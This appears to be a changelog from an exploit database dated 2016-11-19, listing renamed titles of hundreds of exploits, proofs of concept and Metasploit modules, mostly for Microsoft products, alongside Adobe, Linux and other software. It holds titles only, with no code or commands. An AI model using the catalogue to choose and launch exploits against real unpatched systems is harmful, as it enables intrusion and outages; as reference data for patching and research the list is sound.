DB: 2016-11-19

14 new exploits

Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)

Microsoft Windows - 'Jolt2.c' Denial of Service
Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029)

Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service
Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)

Ventrilo 2.3.0 - Remote Denial of Service (All Platforms)
Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service

Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)
Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)

Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)
Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)

Microsoft Windows Vista - Access Violation from Limited Account Exploit (BSoD)
Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)

Microsoft Windows 2003 - '.EOT' BSOD Crash
Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash

Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)

Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit)
Microsoft Windows 2000<2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)

Google Chrome 4.1 - OOB Array Indexing
Google Chrome 4.1 - Out-of-Bounds Array Indexing

Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)
Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)

CommView 6.1 (Build 636) - Local Denial of Service (BSOD)
CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)

Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)
Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)

Microsoft Cinepak Codec CVDecompress - Heap Overflow
Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)

Microsoft Unicode Scripts Processor - Remote Code Execution
Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)

Microsoft Office - HtmlDlgHelper Class Memory Corruption
Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)

Microsoft Plug and Play Service - Overflow Exploit (Metasploit)
Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)

Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC)
Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)

Microsoft HyperV - Persistent Denial of Service
Microsoft HyperV - Persistent Denial of Service (MS11-047)

Crush FTP 5 - 'APPE' command Remote JVM BSOD (PoC)
Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC)
Microsoft WINS Service 5.2.3790.4520 - Memory Corruption
Microsoft WINS - ECommEndDlg Input Validation Error
Microsoft WINS Service 5.2.3790.4520 - Memory Corruption (MS11-035)
Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)

Win32k - Null Pointer De-reference PoC (MS11-077)
Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)

Winows 7 keylayout - Blue Screen
Microsoft Winows 7 - Keyoard Layout Blue Screen of Death (MS10-073)

Apple Safari - GdiDrawStream BSoD
Apple Safari - GdiDrawStream Blue Screen of Death

PeerBlock 1.1 - BSOD Exploit
PeerBlock 1.1 - Blue Screen of Death Exploit

.NET Framework EncoderParameter - Integer Overflow
Microsoft .NET Framework EncoderParameter - Integer Overflow (MS12-025)

Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034)
Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)

Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass
Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)

Microsoft Windows Media Services 4.0/4.1 - Denial of Service
Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)

Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)
Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2)

Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service
Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)

Microsoft IIS 4.0/5.0 - FTP Denial of Service
Microsoft IIS 4.0/5.0 - FTP Denial of Service (MS01-026)

Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service
Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)

Microsoft Windows XP/2000 - showHelp CHM File Execution
Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)

Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service
Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)

Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities
Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)

DirectShow - Arbitrary Memory Overwrite (MS13-056)
Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)

Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1)
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)

Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow
Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083)

Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads
Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021)

Google Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow
Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow

Avast! - OOB Write Decrypting PEncrypt Packed executables
Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables

Microsoft Office - COM Object DLL Planting with 'WMALFXGFXDSP.dll' (MS16-007)
Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)

Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Microsoft Edge - 'Array.splice' Heap Overflow
Moxa SoftCMS 1.5 - Denial of Service (PoC)
Microsoft Edge - 'FillFromPrototypes' Type Confusion
Microsoft Edge - 'Array.filter' Info Leak
Microsoft Edge - 'Array.reverse' Overflow
Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow
Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)
Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)
Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)
Microsoft Windows 2000 - Utility Manager All-in-One Exploit (MS04-019)
Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - Universal Language Utility Manager Exploit (MS04-019)
Microsoft Windows Server 2000/XP - Task Scheduler .job Exploit (MS04-022)
Microsoft Windows Server 2000 - Utility Manager All-in-One Exploit (MS04-019)

Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)
Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)

Microsoft Windows 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)
Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)

Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)
Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)

Microsoft Excel - 0x5D record Stack Overflow
Microsoft Excel - 0x5D record Stack Overflow (MS10-038)

Win32k - Keyboard Layout (MS10-073)
Microsoft Win32k - Keyboard Layout (MS10-073)
Adobe - Doc.media.newPlayer Use-After-Free (1)
Adobe - 'util.printf()' Buffer Overflow (1)
Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)
Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)

Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)
Adobe - JBIG2Decode Memory Corruption (1)
Adobe - Collab.getIcon() Buffer Overflow (1)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (Metasploit)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)
Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (1)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2)
Media Jukebox 8.0.400 - Buffer Overflow (SEH)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (2)
Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (2)
Adobe - Doc.media.newPlayer Use-After-Free (2)
Adobe - 'util.printf()' Buffer Overflow (2)
Microsoft Excel - Malformed FEATHEADER Record (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)
Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (2)
Adobe - 'util.printf()' Buffer Overflow (Metasploit) (2)
Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)

HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)

WM Downloader 3.1.2.2 - Buffer Overflow (2)
WM Downloader 3.1.2.2 - Buffer Overflow (Metasploit) (2)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (2)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)

Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)
Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)

Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (Metasploit)
Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)
gAlan 0.2.1 - Buffer Overflow (2)
Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (Metasploit)
gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)
Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)

BACnet OPC Client - Buffer Overflow (2)
BACnet OPC Client - Buffer Overflow (Metasploit) (2)

Adobe - JBIG2Decode Memory Corruption (2)
Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)

Mini-stream 3.0.1.1 - Buffer Overflow (2)
Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)
Adobe - Collab.getIcon() Buffer Overflow (2)
Adobe PDF - Escape EXE Social Engineering (No JavaScript)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (4)
Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)
Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)
HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)
Microsoft Word - RTF pFragments Stack Buffer Overflow (File Format)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)

Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)
Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1)

Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit)
Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit)

Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016)
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)

Microsoft Excel 2007 SP2 - Buffer Overwrite
Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)

Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3)
Mini-stream Ripper 3.0.1.1 - Buffer Overflow (Metasploit) (3)

Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021)
Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021) (Metasploit)

Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038)
Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)

Microsoft Office 2003 Home/Pro - Code Execution
Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)

Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)
Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)

Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit)
Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit)

Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request
Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003)

Microsoft Windows Kernel - Intel x64 SYSRET (PoC)
Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)

Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080)
Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit)

Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101)
Microsoft Windows Kerberos - Security Feature Bypass (MS16-101)

Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation
Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011)

Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation
Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)

Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)
Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)

VMware - Setuid VMware-mount Unsafe popen(3)
VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)

Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (Metasploit)
Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)

Microsoft Word - RTF Object Confusion (MS14-017)
Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)

Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)
.NET Deployment Service - IE Sandbox Escape (MS14-009)
Registry Symlink - IE Sandbox Escape (MS13-097)
Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)
Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)

Microsoft Windows - OLE Package Manager Code Execution (MS14-060)
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)

Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (Metasploit)
Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution Through Python (MS14-064)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064)
Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)

Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004)
Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)

Microsoft Windows Server 2003 SP2 - Privilege Escalation
Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)

Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation
Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)

Publish-It - '.PUI' Buffer Overflow (SEH)
Publish-It - '.PUI' Buffer Overflow (SEH) (Metasploit)

Microsoft Windows - ClientCopyImage Win32k Exploit (Metasploit)
Microsoft Windows - ClientCopyImage Win32k Exploit (MS15-051) (Metasploit)

Microsoft Word - Local Machine Zone Remote Code Execution
Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)

VideoCharge Studio - Buffer Overflow (SEH)
VideoCharge Studio - Buffer Overflow (SEH) (Metasploit)

Microsoft Windows - NtUserGetClipboardAccessToken Token Leak
Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)

Microsoft Windows - Font Driver Buffer Overflow (MS15-078)
Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)

Nagios 4.2.2 - Privilege Escalation

ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)
ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation

Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)

VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)
VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation
Palo Alto Networks PanOS root_trace - Privilege Escalation
Palo Alto Networks PanOS root_reboot - Privilege Escalation

RealServer < 8.0.2 - Remote Exploit (Windows Platforms)
RealServer < 8.0.2 (Windows Platforms) - Remote Exploit

Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)
Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)

Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)
Microsoft Windows Server 2000/XP - Workstation Service Overflow (MS03-049)

Microsoft Windows 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)
Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)

Microsoft Windows - 'WINS' Remote Buffer Overflow (3)
Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)

Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)
Microsoft Windows Message Queuing - Buffer Overflow Universal Exploit (MS05-017) (v.0.3)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)
eIQnetworks License Manager - Remote Buffer Overflow (1) (Metasploit)
eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)

Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)

Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)

Microsoft Windows - NetpManageIPCConnect - Stack Overflow (Python)
Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)
Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow
Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow
Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)
Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)

CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (1)

Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)

Microsoft Windows Message Queuing Service - RPC Buffer Overflow
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)

Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC)
Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054)

Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly
Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)

Movie Maker - Remote Code Execution (MS10-016)
Microsoft Movie Maker - Remote Code Execution (MS10-016)

ASP.NET - Padding Oracle (MS10-070)
Microsoft ASP.NET - Padding Oracle (MS10-070)
ASP.NET - Padding Oracle File Download (MS10-070)
Microsoft Windows - NTLM Weak Nonce
Microsoft ASP.NET - Padding Oracle File Download (MS10-070)
Microsoft Windows - NTLM Weak Nonce (MS10-012)

ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)
Microsoft ASP.NET - Auto-Decryptor File Download Exploit (MS10-070)

Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1)
PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie)
Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)
PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit)

Axis2 - Authenticated Code Execution (via REST)
Axis2 - Authenticated Code Execution (via REST) (Metasploit)

Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)
Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) (Metasploit)
Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (Metasploit)
Microsoft Private Communications Transport - Overflow Exploit (Metasploit)
Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)
Microsoft Private Communications Transport - Overflow Exploit (MS04-011) (Metasploit)
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (Metasploit)
Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (Metasploit)
Microsoft IIS - Phone Book Service Overflow (Metasploit)
Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit)
Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)
Microsoft IIS - Phone Book Service Overflow (MS00-094) (Metasploit)
Microsoft WINS - Service Memory Overwrite (Metasploit)
Microsoft Windows - SMB Relay Code Execution (Metasploit)
Microsoft Windows - Print Spooler Service Impersonation (MS10-061)
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (Metasploit)
Microsoft RRAS Service - Overflow Exploit (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (Metasploit)
Microsoft Server Service - NetpwPathCanonicalize Overflow (Metasploit)
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (Metasploit)
Microsoft Services - 'nwwks.dll' (MS06-066)
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)
Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit)
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
Microsoft RRAS Service - Overflow Exploit (MS06-025) (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit)
Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)
Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)
Microsoft NetDDE Service - Overflow Exploit (Metasploit)
Microsoft Workstation Service - NetpManageIPCConnect Overflow (Metasploit)
Microsoft Services - 'nwapi32.dll' (MS06-066)
Microsoft NetDDE Service - Overflow Exploit (MS04-031) (Metasploit)
Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit)
Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)

Microsoft RRAS Service - RASMAN Registry Overflow (Metasploit)
Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit)
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (Metasploit)
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (Metasploit)
Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit)
Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit)
Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit)

Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)
Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (Metasploit)
Microsoft SQL Server - Resolution Overflow (Metasploit)
Microsoft SQL Server - Payload Execution (via SQL Injection)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)
Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)

Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (via SQL Injection)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)

Microsoft SQL Server - Hello Overflow (Metasploit)
Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (2)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (2)

CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (3)
CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (3)

CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1)

IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)
IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (1)

HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)
HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)

Microsoft DirectX DirectShow - SAMI Buffer Overflow (Metasploit)
Microsoft DirectX DirectShow - SAMI Buffer Overflow (MS07-064) (Metasploit)

HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)
HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (Metasploit)
Microsoft IIS 4.0 - '.htr' Path Overflow (Metasploit)
Microsoft IIS 5.0 - Printer Host Header Overflow (Metasploit)
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (Metasploit)
Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit)
Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)
Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)

Microsoft IIS 5.0 - IDQ Path Overflow (Metasploit)
Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit)

Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)
Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (1)
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (Metasploit)
Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (Metasploit)
Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)
Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)

